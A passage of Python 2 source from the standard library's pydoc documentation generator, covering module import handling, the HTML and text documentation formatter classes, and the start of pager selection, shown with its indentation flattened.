is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
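# The dispatch above is the whole contract of a formatter: document() routes an
# object to docmodule/docclass/docroutine/docproperty/docdata/docother, and a
# subclass only supplies the handlers it cares about. A hypothetical sketch:
#
#     class NameOnlyDoc(Doc):
#         def docmodule(self, object, name=None, *args):
#             return 'module %s' % object.__name__
#         def docroutine(self, object, name=None, *args):
#             return 'routine %s' % object.__name__
#         docclass = docroutine
#     # anything not handled still falls through to Doc.fail and raises TypeError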
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
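# Quick illustration of the safe repr/escape behaviour above:
#
#     r = HTMLRepr()
#     r.escape('a < b & c')     # -> 'a &lt; b &amp; c'
#     r.repr('x' * 500)         # cropped to maxstring characters with '...'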
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '&quot;')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
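# markup() HTML-escapes plain text while turning URLs, "RFC nnnn", "PEP nnnn"
# and known identifiers into links, e.g. (using the module-level `html`
# instance defined further below):
#
#     html.markup('See PEP 8 and http://python.org for details.')
#     # -> 'See <a href="http://www.python.org/dev/peps/pep-0008/">PEP 8</a> and ...'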
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
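# Putting the HTML formatter together (illustrative sketch; the module-level
# `html` instance defined further below is the one normally used):
#
#     import pydoc
#     page = pydoc.html.page(pydoc.describe(pydoc),
#                            pydoc.html.document(pydoc, 'pydoc'))
#     open('pydoc.html', 'w').write(page)    # roughly what writedoc() does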
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
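# Text-mode counterpart (illustrative sketch): render_doc() below wraps the
# module-level `text` instance, so TextDoc is rarely driven directly.
#
#     import pydoc
#     print pydoc.text.document(len)                  # overstruck-bold text
#     print pydoc.plain(pydoc.text.document(len))     # same, bold stripped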
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
